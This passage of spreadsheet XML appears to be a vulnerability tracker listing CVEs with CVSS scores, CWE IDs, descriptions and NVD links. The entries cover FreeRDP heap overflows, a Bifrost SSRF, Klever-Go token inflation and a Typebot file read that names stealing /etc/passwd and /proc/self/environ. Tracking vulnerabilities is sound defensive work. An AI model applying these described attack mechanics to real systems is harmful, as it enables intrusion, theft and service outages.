        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54729</t>
        </is>
      </c>
    </row>
    <row r="1149">
      <c r="A1149" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1149" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55100</t>
        </is>
      </c>
      <c r="C1149" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1149" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1149" s="5" t="inlineStr"/>
      <c r="F1149" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1149" s="5" t="inlineStr">
        <is>
          <t>node.js</t>
        </is>
      </c>
      <c r="H1149" s="5" t="inlineStr"/>
      <c r="I1149" s="5" t="inlineStr">
        <is>
          <t>2026-07-31</t>
        </is>
      </c>
      <c r="J1149" s="5" t="inlineStr"/>
      <c r="K1149" s="5" t="inlineStr">
        <is>
          <t>CWE-23, CWE-74</t>
        </is>
      </c>
      <c r="L1149" s="5" t="inlineStr">
        <is>
          <t>hashi-vault-js is a Node.js module for interacting with the HashiCorp Vault API. Prior to 0.5.2, src/Vault.js concatenates unencoded identifier values including name, username, group, role, and version into Vault request paths and query strings instead of using encodeURIComponent() and URLSearchParams, allowing path traversal and query parameter injection. This issue is fixed in version 0.5.2.</t>
        </is>
      </c>
      <c r="M1149" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55100</t>
        </is>
      </c>
    </row>
    <row r="1150">
      <c r="A1150" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1150" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55191</t>
        </is>
      </c>
      <c r="C1150" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1150" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1150" s="5" t="inlineStr"/>
      <c r="F1150" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G1150" s="5" t="inlineStr"/>
      <c r="H1150" s="5" t="inlineStr"/>
      <c r="I1150" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J1150" s="5" t="inlineStr"/>
      <c r="K1150" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-190</t>
        </is>
      </c>
      <c r="L1150" s="5" t="inlineStr">
        <is>
          <t>FreeRDP is a free implementation of the Remote Desktop Protocol. Prior to 3.27.0, FreeRDP clients that negotiate RDPGFX AVC444 with an H.264 decoder backend calculate the intermediate YUV444 allocation size in libfreerdp/codec/h264.c with 32-bit multiplication in avc444_ensure_buffer. A malicious RDP server can supply surface dimensions for which piDstStride multiplied by padDstHeight wraps to a small nonzero value, causing winpr_aligned_recalloc to allocate an undersized buffer before YUV420CombineToYUV444 writes using the actual stride and rectangle dimensions. This can cause a client crash and may permit code execution through attacker-influenced heap corruption. This issue is fixed in version 3.27.0.</t>
        </is>
      </c>
      <c r="M1150" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55191</t>
        </is>
      </c>
    </row>
    <row r="1151">
      <c r="A1151" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1151" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55193</t>
        </is>
      </c>
      <c r="C1151" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1151" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1151" s="5" t="inlineStr"/>
      <c r="F1151" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G1151" s="5" t="inlineStr"/>
      <c r="H1151" s="5" t="inlineStr"/>
      <c r="I1151" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J1151" s="5" t="inlineStr"/>
      <c r="K1151" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L1151" s="5" t="inlineStr">
        <is>
          <t>FreeRDP is a free implementation of the Remote Desktop Protocol. Prior to 3.27.0, FreeRDP clients using TS Gateway accept a server-controlled max_xmit_frag value in libfreerdp/core/gateway/rpc_bind.c without bounding it to the 4088-byte ReceiveFragment allocation. A malicious gateway can advertise 65535 and then send a response fragment of the same length, causing rpc_channel_read in libfreerdp/core/gateway/rpc.c to write up to 65535 bytes into the smaller ReceiveFragment buffer. This can crash the client and may permit code execution through attacker-controlled heap corruption. This issue is fixed in version 3.27.0.</t>
        </is>
      </c>
      <c r="M1151" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55193</t>
        </is>
      </c>
    </row>
    <row r="1152">
      <c r="A1152" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1152" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55194</t>
        </is>
      </c>
      <c r="C1152" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1152" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1152" s="5" t="inlineStr"/>
      <c r="F1152" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G1152" s="5" t="inlineStr"/>
      <c r="H1152" s="5" t="inlineStr"/>
      <c r="I1152" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J1152" s="5" t="inlineStr"/>
      <c r="K1152" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L1152" s="5" t="inlineStr">
        <is>
          <t>FreeRDP is a free implementation of the Remote Desktop Protocol. Prior to 3.27.0, rpc_client_recv_fragment in libfreerdp/core/gateway/rpc_client.c ensures the response reassembly stream capacity using only the server-declared alloc_hint rather than the actual StubLength about to be written. A malicious TS Gateway can send a PTYPE_RESPONSE with a small alloc_hint and a much larger frag_length, causing Stream_Write to copy attacker-controlled stub data beyond the 4096-byte pdu-&gt;s buffer. This can crash the client and may permit code execution through heap corruption. This issue is fixed in version 3.27.0.</t>
        </is>
      </c>
      <c r="M1152" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55194</t>
        </is>
      </c>
    </row>
    <row r="1153">
      <c r="A1153" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1153" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55245</t>
        </is>
      </c>
      <c r="C1153" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1153" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1153" s="5" t="inlineStr"/>
      <c r="F1153" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1153" s="5" t="inlineStr"/>
      <c r="H1153" s="5" t="inlineStr"/>
      <c r="I1153" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="J1153" s="5" t="inlineStr"/>
      <c r="K1153" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L1153" s="5" t="inlineStr">
        <is>
          <t>Bifrost is an enterprise AI gateway for routing requests to model providers. Prior to 1.5.17, the isPublicIP function in core/providers/utils/fetch.go, reached through FetchAndEncodeURL for Bedrock and Vertex image or document URLs, classifies Carrier-Grade NAT 100.64.0.0/10, IPv6 6to4 2002::/16, NAT64 64:ff9b::/96 and 64:ff9b:1::/48, and deprecated IPv6 site-local fec0::/10 addresses as public. A remote attacker who controls a multimodal request URL can make the gateway fetch internal services, including a cloud instance metadata endpoint encoded through 6to4 or NAT64. This issue is fixed in version 1.5.17.</t>
        </is>
      </c>
      <c r="M1153" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55245</t>
        </is>
      </c>
    </row>
    <row r="1154">
      <c r="A1154" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1154" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55250</t>
        </is>
      </c>
      <c r="C1154" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1154" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1154" s="5" t="inlineStr"/>
      <c r="F1154" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G1154" s="5" t="inlineStr">
        <is>
          <t>sap</t>
        </is>
      </c>
      <c r="H1154" s="5" t="inlineStr"/>
      <c r="I1154" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1154" s="5" t="inlineStr"/>
      <c r="K1154" s="5" t="inlineStr">
        <is>
          <t>CWE-294, CWE-613, CWE-672</t>
        </is>
      </c>
      <c r="L1154" s="5" t="inlineStr">
        <is>
          <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
        </is>
      </c>
      <c r="M1154" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55250</t>
        </is>
      </c>
    </row>
    <row r="1155">
      <c r="A1155" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1155" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55763</t>
        </is>
      </c>
      <c r="C1155" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1155" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1155" s="5" t="inlineStr"/>
      <c r="F1155" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1155" s="5" t="inlineStr"/>
      <c r="H1155" s="5" t="inlineStr"/>
      <c r="I1155" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="J1155" s="5" t="inlineStr"/>
      <c r="K1155" s="5" t="inlineStr">
        <is>
          <t>CWE-841</t>
        </is>
      </c>
      <c r="L1155" s="5" t="inlineStr">
        <is>
          <t>Klever-Go is the Go implementation of the Klever blockchain protocol. Prior to 1.7.19, processPercentageRoyaltiesTransfer in core/kapp/accounts/accounts.go calls SubFromBalance after the split loop and after the royaltiesToPay &lt;= 0 early return. computeSplitRoyalties rejects only when splitToPay &gt; royaltiesToPay, so a valid PercentTransferPercentage = 10000 split consumes exactly 100 percent of the royalty pool, sets royaltiesToPay to zero, and returns before the source account is debited. The split recipient receives the full royaltyAmount while the sender pays nothing and the supply counter is not updated, allowing unbounded off-the-books inflation of the transferred KDA. A KDA owner must configure a TransferPercentage royalty with a 100 percent split, after which any holder's transfer of the asset triggers the mint; the sibling processFixedRoyaltiesTransfer path is not affected because it debits the source before distribution. This issue is fixed in version 1.7.19.</t>
        </is>
      </c>
      <c r="M1155" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55763</t>
        </is>
      </c>
    </row>
    <row r="1156">
      <c r="A1156" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1156" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55764</t>
        </is>
      </c>
      <c r="C1156" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1156" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1156" s="5" t="inlineStr"/>
      <c r="F1156" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1156" s="5" t="inlineStr"/>
      <c r="H1156" s="5" t="inlineStr"/>
      <c r="I1156" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="J1156" s="5" t="inlineStr"/>
      <c r="K1156" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="L1156" s="5" t="inlineStr">
        <is>
          <t>Klever-Go is the Go implementation of the Klever blockchain protocol. Prior to 1.7.19, Klever-Go allows a mint-role holder to bypass a finite per-nonce MaxSupply on the semi-fungible token add-quantity path. In core/kapp/systemAccount/systemAcount.go, SFTAddCirculation performed meta.Circulation += amount before evaluating whether Circulation exceeded MaxSupply, without checking for signed int64 overflow. A large positive raw Amount supplied through processSemiFungibleAddQuantity in core/kapp/kda/mint.go can wrap Circulation negative, causing the signed maximum-supply comparison to pass and crediting approximately MaxInt64 units while corrupting the on-chain counter. The fungible path is not affected because its MintedValue &lt;= 0 guard detects the overflow. The correction uses the consensus activation flag FixMarketBuyOverflow. This issue is fixed in version 1.7.19.</t>
        </is>
      </c>
      <c r="M1156" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55764</t>
        </is>
      </c>
    </row>
    <row r="1157">
      <c r="A1157" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1157" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55768</t>
        </is>
      </c>
      <c r="C1157" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1157" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1157" s="5" t="inlineStr"/>
      <c r="F1157" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1157" s="5" t="inlineStr"/>
      <c r="H1157" s="5" t="inlineStr"/>
      <c r="I1157" s="5" t="inlineStr">
        <is>
          <t>2026-07-30</t>
        </is>
      </c>
      <c r="J1157" s="5" t="inlineStr"/>
      <c r="K1157" s="5" t="inlineStr">
        <is>
          <t>CWE-681, CWE-789</t>
        </is>
      </c>
      <c r="L1157" s="5" t="inlineStr">
        <is>
          <t>GoAccess is a real-time web log analyzer and interactive viewer that runs in a terminal in *nix systems or through the browser. Prior to version 1.11, the built-in WebSocket server narrows a 64-bit extended frame length into the signed 32-bit WSFrame.payloadlen field before enforcing the maximum frame size, allowing an unauthenticated remote client to bypass the guard and force an approximately 18-exabyte allocation request that terminates the process. This issue is fixed in version 1.11.</t>
        </is>
      </c>
      <c r="M1157" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55768</t>
        </is>
      </c>
    </row>
    <row r="1158">
      <c r="A1158" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1158" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-56718</t>
        </is>
      </c>
      <c r="C1158" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1158" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1158" s="5" t="inlineStr"/>
      <c r="F1158" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G1158" s="5" t="inlineStr"/>
      <c r="H1158" s="5" t="inlineStr"/>
      <c r="I1158" s="5" t="inlineStr">
        <is>
          <t>2026-08-30</t>
        </is>
      </c>
      <c r="J1158" s="5" t="inlineStr"/>
      <c r="K1158" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L1158" s="5" t="inlineStr">
        <is>
          <t>AJCloud AJY IPC firmware prior to version 01.10715.11.37 contains a path traversal vulnerability in the jdbhttpd web service that allows unauthenticated remote attackers to read arbitrary files with root privileges by supplying path traversal sequences in the HTTP request URI. Attackers can send crafted HTTP requests to port 80 without authentication to access sensitive files including cleartext RTSP credentials, Wi-Fi SSID and pre-shared key, device serial number, and cloud binding parameters.</t>
        </is>
      </c>
      <c r="M1158" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-56718</t>
        </is>
      </c>
    </row>
    <row r="1159">
      <c r="A1159" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1159" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-57445</t>
        </is>
      </c>
      <c r="C1159" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1159" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1159" s="5" t="inlineStr"/>
      <c r="F1159" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1159" s="5" t="inlineStr"/>
      <c r="H1159" s="5" t="inlineStr"/>
      <c r="I1159" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J1159" s="5" t="inlineStr"/>
      <c r="K1159" s="5" t="inlineStr">
        <is>
          <t>CWE-703</t>
        </is>
      </c>
      <c r="L1159" s="5" t="inlineStr">
        <is>
          <t>Gardens v2 is a modular governance framework that enables communities to create and manage multiple governance pools with customizable parameters and voting mechanisms. In dfba919e218e20d52db9f7b2e8d292d45a46c91b and prior, normal beneficiary payout paths in StreamingEscrow preserve depositAmount() while an active stream needs an escrow reserve. However, the approve-side dispute resolution path drains the whole available escrow balance to the proposal beneficiary. At time of publication, there are no publicly known patches.</t>
        </is>
      </c>
      <c r="M1159" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-57445</t>
        </is>
      </c>
    </row>
    <row r="1160">
      <c r="A1160" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1160" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-59643</t>
        </is>
      </c>
      <c r="C1160" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1160" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1160" s="5" t="inlineStr"/>
      <c r="F1160" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1160" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1160" s="5" t="inlineStr">
        <is>
          <t>bouncycastle:bc-java, bouncycastle:bcpg-fips</t>
        </is>
      </c>
      <c r="I1160" s="5" t="inlineStr">
        <is>
          <t>2026-08-03</t>
        </is>
      </c>
      <c r="J1160" s="5" t="inlineStr"/>
      <c r="K1160" s="5" t="inlineStr">
        <is>
          <t>CWE-347</t>
        </is>
      </c>
      <c r="L1160" s="5" t="inlineStr">
        <is>
          <t>In Bouncy Castle for Java before 1.85, OpenPGP inline-signature policy failures silently ignored. This issue also affects Bouncy Castle for Java FIPS (BC-FJA) before bcpg-fips 2.0.13.</t>
        </is>
      </c>
      <c r="M1160" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-59643</t>
        </is>
      </c>
    </row>
    <row r="1161">
      <c r="A1161" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1161" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-61556</t>
        </is>
      </c>
      <c r="C1161" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1161" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1161" s="5" t="inlineStr"/>
      <c r="F1161" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1161" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1161" s="5" t="inlineStr"/>
      <c r="I1161" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J1161" s="5" t="inlineStr"/>
      <c r="K1161" s="5" t="inlineStr">
        <is>
          <t>CWE-835</t>
        </is>
      </c>
      <c r="L1161" s="5" t="inlineStr">
        <is>
          <t>LiquidJS is a Shopify / GitHub Pages compatible template engine in pure JavaScript. From 10.26.0 until 10.27.1, the strip_html filter in src/filters/html.ts can enter an infinite loop when an input string contains &lt;, includes at least one preceding character, and has no later &gt;. In strip_html, the search for the next opener advances lt while the loop index remains unchanged when the closer search returns -1, and the equality-only stall guard does not exit because the loop index is less than lt. Reprocessing the same state indefinitely blocks template rendering and can cause denial of service with an input as short as a&lt;. This issue is fixed in version 10.27.1.</t>
        </is>
      </c>
      <c r="M1161" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-61556</t>
        </is>
      </c>
    </row>
    <row r="1162">
      <c r="A1162" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1162" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62243</t>
        </is>
      </c>
      <c r="C1162" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1162" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1162" s="5" t="inlineStr"/>
      <c r="F1162" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1162" s="5" t="inlineStr">
        <is>
          <t>java, openssl, .net</t>
        </is>
      </c>
      <c r="H1162" s="5" t="inlineStr"/>
      <c r="I1162" s="5" t="inlineStr">
        <is>
          <t>2026-08-22</t>
        </is>
      </c>
      <c r="J1162" s="5" t="inlineStr"/>
      <c r="K1162" s="5" t="inlineStr">
        <is>
          <t>CWE-297</t>
        </is>
      </c>
      <c r="L1162" s="5" t="inlineStr">
        <is>
          <t>Netty (io.netty:netty-handler) versions from 4.2.0.Final through 4.2.16.Final and versions through 4.1.136.Final disable TLS hostname verification on the SslProvider.OPENSSL client path when a plain (non-extended) X509TrustManager is used and Unsafe-based trust-manager wrapping is unavailable (Java 25+). In this configuration the OpenSSL client does not perform hostname verification, allowing a man-in-the-middle attacker to present a certificate issued for a different hostname that is accepted without validation. Fixed in 4.2.17.Final and 4.1.137.Final.</t>
        </is>
      </c>
      <c r="M1162" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62243</t>
        </is>
      </c>
    </row>
    <row r="1163">
      <c r="A1163" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1163" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62292</t>
        </is>
      </c>
      <c r="C1163" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1163" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1163" s="5" t="inlineStr"/>
      <c r="F1163" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1163" s="5" t="inlineStr"/>
      <c r="H1163" s="5" t="inlineStr"/>
      <c r="I1163" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J1163" s="5" t="inlineStr"/>
      <c r="K1163" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L1163" s="5" t="inlineStr">
        <is>
          <t>libheif is a HEIF and AVIF file format decoder and encoder. From 1.19.0 until 1.23.1, a crafted uncompressed HEIF image using generic zlib unci full-item compression can crash an application that decodes an advertised tile with heif_image_handle_decode_image_tile(). In libheif/codecs/uncompressed/unc_decoder.cc, unc_decoder::fetch_tile_data() computes a large tile offset and unc_decoder::get_compressed_image_data_uncompressed() validates it with range_start_offset plus range_size. For the last advertised tile (4095, 4095), the addition can wrap to zero, bypass the bounds check, and pass an invalid source pointer and a one-terabyte length to memcpy. The observed result is an out-of-bounds read and process crash; opening the file alone does not trigger the issue because tile decoding is required. This issue is fixed in version 1.23.1.</t>
        </is>
      </c>
      <c r="M1163" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62292</t>
        </is>
      </c>
    </row>
    <row r="1164">
      <c r="A1164" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1164" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62648</t>
        </is>
      </c>
      <c r="C1164" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1164" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1164" s="5" t="inlineStr"/>
      <c r="F1164" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1164" s="5" t="inlineStr"/>
      <c r="H1164" s="5" t="inlineStr"/>
      <c r="I1164" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1164" s="5" t="inlineStr"/>
      <c r="K1164" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="L1164" s="5" t="inlineStr">
        <is>
          <t>A vulnerability has been identified in Reyrolle 7SR5 (All versions &lt; V2.70). The length of the URL component contained in pre-authenticated HTTP messages is not properly validated before appending additional data to it, resulting in an out-of-bounds write condition in memory. This could allow an unauthenticated remote attacker to crash the affected device, causing a reboot and resulting in a denial-of-service condition.</t>
        </is>
      </c>
      <c r="M1164" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62648</t>
        </is>
      </c>
    </row>
    <row r="1165">
      <c r="A1165" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1165" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62649</t>
        </is>
      </c>
      <c r="C1165" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1165" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1165" s="5" t="inlineStr"/>
      <c r="F1165" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1165" s="5" t="inlineStr"/>
      <c r="H1165" s="5" t="inlineStr"/>
      <c r="I1165" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1165" s="5" t="inlineStr"/>
      <c r="K1165" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="L1165" s="5" t="inlineStr">
        <is>
          <t>A vulnerability has been identified in Reyrolle 7SR5 (All versions &lt; V2.70). The web server does not properly limit or manage system resources when processing a high volume of concurrent HTTP requests. This could allow an unauthenticated remote attacker to cause the entire device to crash and reboot, resulting in a denial-of-service condition.</t>
        </is>
      </c>
      <c r="M1165" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62649</t>
        </is>
      </c>
    </row>
    <row r="1166">
      <c r="A1166" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1166" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62650</t>
        </is>
      </c>
      <c r="C1166" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1166" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1166" s="5" t="inlineStr"/>
      <c r="F1166" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1166" s="5" t="inlineStr"/>
      <c r="H1166" s="5" t="inlineStr"/>
      <c r="I1166" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1166" s="5" t="inlineStr"/>
      <c r="K1166" s="5" t="inlineStr">
        <is>
          <t>CWE-288</t>
        </is>
      </c>
      <c r="L1166" s="5" t="inlineStr">
        <is>
          <t>A vulnerability has been identified in Reyrolle 7SR5 (All versions &lt; V2.70). Server-side authorization checks in the web-based management interface are not properly enforced, allowing role-based access control (RBAC) restrictions to be bypassed through manipulation of request data. This could allow an authenticated, low-privileged remote attacker to escalate privileges to an administrative level.</t>
        </is>
      </c>
      <c r="M1166" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62650</t>
        </is>
      </c>
    </row>
    <row r="1167">
      <c r="A1167" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1167" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62865</t>
        </is>
      </c>
      <c r="C1167" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1167" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1167" s="5" t="inlineStr"/>
      <c r="F1167" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1167" s="5" t="inlineStr"/>
      <c r="H1167" s="5" t="inlineStr"/>
      <c r="I1167" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="J1167" s="5" t="inlineStr"/>
      <c r="K1167" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-73</t>
        </is>
      </c>
      <c r="L1167" s="5" t="inlineStr">
        <is>
          <t>Typebot is an open-source chatbot builder. In self-hosted versions prior to 3.18.0, the server-side Send Email integration block allows arbitrary reading of local files on the server. The block builds Nodemailer attachments from a typebot variable, and its parseAttachments helper returns the supplied value as a filesystem path whenever it does not start with the application's own base URL, instead of requiring an http or https URL. The Nodemailer transport is created without disableFileAccess or disableUrlAccess, both of which default to false, so an attachment specified as an absolute server path is read from the local filesystem and delivered. Because both the attachment value and the recipient list are attacker-controllable typebot variables, any registered user can publish a bot whose Send Email block attaches an absolute path such as /etc/passwd or /proc/self/environ and mails it to an address they control. This enables reading any file the server process can access, including process environment secrets such as the credential encryption key and database connection string, without administrative privileges or victim interaction. Open signup is enabled by default and the system SMTP credential is already configured, so no non-default configuration is required. This issue is fixed in version 3.18.0.</t>
        </is>
      </c>
      <c r="M1167" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62865</t>
        </is>
      </c>
    </row>
    <row r="1168">
      <c r="A1168" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1168" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63188</t>
        </is>
      </c>
      <c r="C1168" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1168" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
